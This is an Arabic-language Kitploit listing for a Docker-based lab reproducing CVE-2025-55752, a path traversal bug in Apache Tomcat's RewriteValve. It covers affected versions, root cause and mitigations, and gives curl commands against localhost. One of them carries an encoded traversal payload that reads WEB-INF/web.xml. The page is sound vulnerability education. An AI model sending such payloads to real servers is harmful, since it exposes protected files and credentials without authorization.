Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55752 — # بيئة إعادة إنتاج مبنية على Docker لـ CVE-2025-55752، وهي ثغرة اجتياز المسار في RewriteValve الخاص بـ Apache Tomcat، مع توضيح خلل التطبيع قبل فك الترميز وتوفير أوامر الاختبار. | Kitploit
أدوات/GitHubGitHub/masahiro331/cve-2025-55752
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# بيئة إعادة إنتاج مبنية على Docker لـ CVE-2025-55752، وهي ثغرة اجتياز المسار في RewriteValve الخاص بـ Apache Tomcat، مع توضيح خلل التطبيع قبل فك الترميز وتوفير أوامر الاختبار.

عرض المستودع
143منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55752: ثغرة اجتياز المسار في Apache Tomcat

بيئة إعادة إنتاج مبنية على Docker لثغرة CVE-2025-55752، وهي ثغرة اجتياز مسار في Apache Tomcat 10.1.44.

نظرة عامة

CVE-2025-55752 هي ثغرة اجتياز مسار في مكوّن RewriteValve الخاص بـ Apache Tomcat ناتجة عن معالجة غير صحيحة للترتيب: تطبيع عنوان URL يحدث قبل فك ترميز URL. وهذا يسمح للمهاجمين بتجاوز قيود الأمان التي تحمي الدلائل مثل /WEB-INF/ باستخدام تسلسلات اجتياز المسار المشفرة بعنوان URL (..%2f).

خصائص الثغرة

  • معرّف CVE: CVE-2025-55752
  • CVSS v3.1: 7.5 (عالية)
  • CWE: CWE-22 (اجتياز المسار)
  • المكوّن: Apache Tomcat RewriteValve
  • السبب الجذري: ترتيب المعالجة (التطبيع قبل فك الترميز)

الإصدارات المتأثرة

السلسلةالإصدارات المعرضة للخطرالإصدار المُصحَّح
11.x11.0.0-M1 إلى 11.0.1011.0.11+
10.1.x10.1.0-M1 إلى 10.1.4410.1.45+
9.0.x9.0.0-M11 إلى 9.0.1089.0.109+
8.5.x8.5.6 إلى 8.5.100نهاية الدعم - لا يوجد تصحيح

بدء سريع

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

اختبار الثغرة

الاختبار 1: الوصول المباشر إلى WEB-INF (محمي)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

المتوقع: 403 Forbidden

الاختبار 2: كشف المعلومات (قراءة الملفات المحمية)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

المتوقع: 200 OK + محتوى web.xml (تأكيد الثغرة)

كيف تعمل

  1. الطلب: /download?path=..%2fWEB-INF%2fweb.xml
  2. يقوم RewriteValve بإعادة الكتابة إلى: /files/..%2fWEB-INF%2fweb.xml
  3. تطبيع URL (قبل فك الترميز): %2f لا يُعرَف كـ /، .. يبقى
  4. فك ترميز URL: %2f → / → /files/../WEB-INF/web.xml
  5. تحليل المسار: /WEB-INF/web.xml

مشكلة ترتيب المعالجة

root@kitploit:~
الصحيح:    فك الترميز → التطبيع → فحص الأمان
المعرض للخطر: التطبيع → فك الترميز → فحص الأمان ✗

إصلاح Tomcat

  • GitHub: apache/tomcat commit 130d36d8
  • الإصلاح: فك الترميز قبل التطبيع

التخفيف

  1. تعطيل RewriteValve إذا لم يكن مطلوبًا
  2. تعطيل طريقة PUT
  3. قواعد WAF لحظر ../ و %2e%2e
  4. الترقية إلى الإصدارات المُصحَّحة (10.1.45+، 9.0.109+، 11.0.11+)

المراجع

  • أمان Apache Tomcat
  • NVD - CVE-2025-55752
  • OWASP Path Traversal
  • CWE-22: تقييد غير صحيح لاسم المسار

إخلاء مسؤولية

⚠️ تحذير: لا تنشر في بيئة الإنتاج. استخدم فقط في بيئات الاختبار المعزولة.

تنزيل الأداة